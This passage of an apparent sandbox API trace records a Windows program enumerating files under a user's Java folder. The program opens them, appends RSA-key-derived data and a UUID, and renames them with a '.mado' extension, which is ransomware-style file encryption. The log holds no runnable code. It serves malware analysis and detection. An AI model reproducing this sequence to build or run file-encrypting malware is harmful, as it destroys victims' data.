(HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0206.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0206.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0206.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0206.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.697] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\") returned="jre1.7.0_45\\" [0206.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0206.697] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0206.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2df0 [0206.697] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0206.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0206.697] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0206.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c38e8 [0206.697] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0206.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b872e0 [0206.697] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0206.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0206.697] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0206.697] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0206.697] PathFindFileNameW (pszPath="") returned="" [0206.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.697] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0206.698] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0206.698] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x182ac2a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Data1.cab", cAlternateFileName="")) returned 1 [0206.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd6) returned 0x3a67c8 [0206.698] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab") returned=".cab" [0206.698] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.700] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=25340970) returned 1 [0206.700] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.702] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x182ac04, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.702] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.704] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x25805, lpOverlapped=0x0) returned 1 [0206.707] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0206.707] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.707] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.707] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0206.708] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.708] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.708] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0206.708] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.708] GetLastError () returned 0x0 [0206.708] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.708] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0206.708] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.708] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.708] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.709] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0206.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.710] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x182ac2a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.710] WriteFile (in: hFile=0x63c, lpBuffer=0x3b817b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b817b0*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.710] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.710] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.710] CloseHandle (hObject=0x63c) returned 1 [0207.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x3b7b950 [0207.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.055] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab.mado")) returned 1 [0207.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0207.056] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a67c8 | out: hHeap=0x2c0000) returned 1 [0207.057] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68d26e60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xdd600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jre1.7.0_45.msi", cAlternateFileName="JRE170~1.MSI")) returned 1 [0207.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0207.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd6) returned 0x3a67c8 [0207.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0207.057] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi") returned=".msi" [0207.057] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0207.058] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=906752) returned 1 [0207.058] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0207.061] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xdd5da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.061] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0207.063] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0207.063] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x25805, lpOverlapped=0x0) returned 1 [0207.065] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0207.065] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.065] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.065] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0207.066] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0207.066] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0207.066] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0207.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0207.066] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0207.066] GetLastError () returned 0x0 [0207.066] CryptDestroyHash (hHash=0x32ef238) returned 1 [0207.066] 